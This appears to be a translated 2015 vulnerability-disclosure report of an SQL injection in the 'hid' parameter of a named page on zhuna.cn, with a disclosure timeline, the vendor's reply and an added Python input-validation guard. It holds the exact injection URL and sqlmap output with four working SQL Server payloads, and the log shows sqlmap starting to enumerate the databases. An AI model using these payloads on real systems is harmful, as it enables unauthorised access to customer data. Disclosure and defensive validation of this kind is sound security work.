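2015-03-09: Details reported to the vendor; awaiting vendor response
2015-03-09: Vendor confirmed; details disclosed to the vendor only
2015-03-19: Details disclosed to core white hats and experts in related fields
2015-03-29: Details disclosed to regular white hats
2015-04-08: Details disclosed to intern white hats
2015-04-23: Details disclosed to the public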
SQL injection vulnerability on the Zhuna (住哪网) main site
Injection point
http://www.zhuna.cn/e/b2.php?hid=88952634&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10#47436f33-d5e2-4310-8d4a-9eec17a9e962
Testing shows that the hid parameter is injectable.
sqlmap identified the following injection points with a total of 48 HTTP(s) requests:
---
Place: GET
Parameter: hid
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
    Payload: hid=(SELECT (CASE WHEN (4885=4885) THEN 88952634 ELSE 4885*(SELECT4885 FROM master..sysdatabases) END))&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10

    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: hid=-9548 OR 3123=CONVERT(INT,(CHAR(58) CHAR(120) CHAR(122) CHAR(120) CHAR(58) (SELECT (CASE WHEN (3123=3123) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(108) CHAR(111) CHAR(100) CHAR(58)))&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: hid=-3737 OR 2638=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: hid=(SELECT CHAR(58) CHAR(120) CHAR(122) CHAR(120) CHAR(58) (SELECT (CASE WHEN (4578=4578) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(108) CHAR(111) CHAR(100) CHAR(58))&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10
---
[19:36:04] [INFO] testing Microsoft SQL Server
[19:36:04] [INFO] confirming Microsoft SQL Server
[19:36:05] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2008
[19:36:05] [INFO] fetching database names
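An added example, not part of the original report and not the vendor's fix: a strict allow-list check for the five parameters of the request above, usable as a pre-query guard or run over access logs to flag requests like those sqlmap sent. The schema (numeric IDs, year-month-day dates) is an assumption inferred from the benign URL, and the sample request targets are constructed from values on this page.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit, parse_qsl

# Assumed schema, inferred from the benign request on this page: three numeric
# IDs and two dates. The application's real rules are not shown in the report.
ID_RE = re.compile(r"[0-9]{1,12}")
DATE_RE = re.compile(r"[0-9]{4}-[0-9]{1,2}-[0-9]{1,2}")
ID_PARAMS = {"hid", "rid", "pid"}
DATE_PARAMS = {"tm1", "tm2"}

def valid_date(value):
    if not DATE_RE.fullmatch(value):
        return False
    try:
        datetime.strptime(value, "%Y-%m-%d")  # rejects e.g. 2015-13-40
        return True
    except ValueError:
        return False

def rejected_params(target):
    """Return sorted names of parameters that fail the allow-list."""
    bad, seen = set(), set()
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in seen:  # repeated parameter is ambiguous, so reject it
            bad.add(name)
        seen.add(name)
        if name in ID_PARAMS and not ID_RE.fullmatch(value):
            bad.add(name)
        elif name in DATE_PARAMS and not valid_date(value):
            bad.add(name)
    return sorted(bad)

# Constructed request targets; the hid values are copied as printed on this page.
REST = "&rid=88952634&pid=88952634&tm1=2015-3-8&tm2=2015-3-10"
SAMPLES = [
    "/e/b2.php?hid=88952634" + REST,
    "/e/b2.php?hid=(SELECT (CASE WHEN (4885=4885) THEN 88952634 ELSE 4885*"
    "(SELECT4885 FROM master..sysdatabases) END))" + REST,
    "/e/b2.php?hid=88952634&hid=1" + REST,  # duplicate hid
    "/e/b2.php?hid=88952634&rid=1&pid=1&tm1=2015-13-40&tm2=2015-3-10",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(rejected_params(target) or "ok", target[:60])
```

Type validation of this kind complements, and does not replace, binding hid as a parameter in the SQL Server query.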
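You are the professionals.
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-03-09 13:38
Thank you very much for the information you reported; the fix has been handed over to our technical team.
None at this time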